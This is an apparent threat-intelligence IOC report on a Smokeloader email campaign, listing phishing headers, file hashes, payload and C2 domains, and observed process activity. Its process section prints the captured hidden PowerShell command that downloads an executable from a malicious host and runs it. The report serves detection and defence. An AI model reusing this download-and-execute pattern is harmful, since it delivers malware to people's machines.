#smokeloader_100119

1. #IOC #OptiData #VR #smokeloader #WSH #LZH #Powershell
2.  
3. https://pastebin.com/hkskwKvc
4.  
5. previous contact:
6. https://pastebin.com/JmthzrL4
7. https://pastebin.com/1scwT0f8
8. https://pastebin.com/MP3kCSSh
9.  
10. FAQ:
11. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
12.  
13. attack_vector
14. --------------
15. email attach (lzh) > js > WSH > Powershell > GET > AppData\Local\TempZna40.exe
16.  
17. email_headers
18. --------------
19. Received: from relay.hvosting.ua (alt1-relay.hvosting.ua [91.200.40.211])
20. by srv8.victim1.com for <user0@victim1.com>;
21. Received: from unallocated.sta.mtm.kiev.ua (unknown [178.54.46.113])
22. (Authenticated sender: info@engineer3d.com.ua)
23. by relay.hvosting.ua for <user0@victim1.com>;
24. Thu, 10 Jan 2019 13:31:52 +0200 (EET)
25. From: Валя <info@engineer3d.com.ua>
26. Subject: Добрий день. К оплате за 10-е 2019р
27. To: "user0" <user0@victim1.com>
28.  
29. files
30. --------------
31. SHA-256 fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550
32. File name рахунки.lzh [LHarc 1.x/ARX archive data [lh0]]
33. File size 26.63 KB
34.  
35. SHA-256 a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520
36. File name Pax_5451_10_01_2019p..docx [Microsoft Word 2007+] - CLEAN
37. File size 15.44 KB
38.  
39. SHA-256 ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd
40. File name Pax_5451_10_01_2019p..js [ASCII text]
41. File size 11.09 KB
42.  
43. SHA-256 d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878
44. File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
45. File size 544 KB
46.  
47. activity
48. **************
49.  
50. PL_SRC musicaustriallc{.} ru/instadoc/liter.exe
51.  
52. C2 aviatorssm{.} bit/
53.  
54. netwrk
55. --------------
56. 213.183.59.103 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/5.0
57. [!This program cannot be run in DOS mode.]
58.  
59. comp
60. --------------
61. powershell.exe 3300 TCP 51187 176.53.161.182 80
62.  
63. proc
64. --------------
65. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax_5451_10_01_2019p..js"
66. "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','%temp%Zna40.exe'); & start %temp%Zna40.exe
67. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','C:\tmpZna40.exe');
68. C:\tmpZna40.exe
69. C:\Users\support\AppData\Local\TempZna40.exe
70.  
71. persist
72. --------------
73. n/a (detects vm, sleeps)
74.  
75. drop
76. --------------
77. C:\tmpZna40.exe
78. C:\Users\support\AppData\Local\TempZna40.exe
79.  
80. # # #
81. https://www.virustotal.com/#/file/fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550/details
82. https://www.virustotal.com/#/file/a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520/details
83. https://www.virustotal.com/#/file/ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd/details
84. https://www.virustotal.com/#/file/d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878/details
85. https://analyze.intezer.com/#/analyses/3ba6c49c-8901-483a-8d2c-f626b1b4c298
86.  
87. VR
88.  
89. @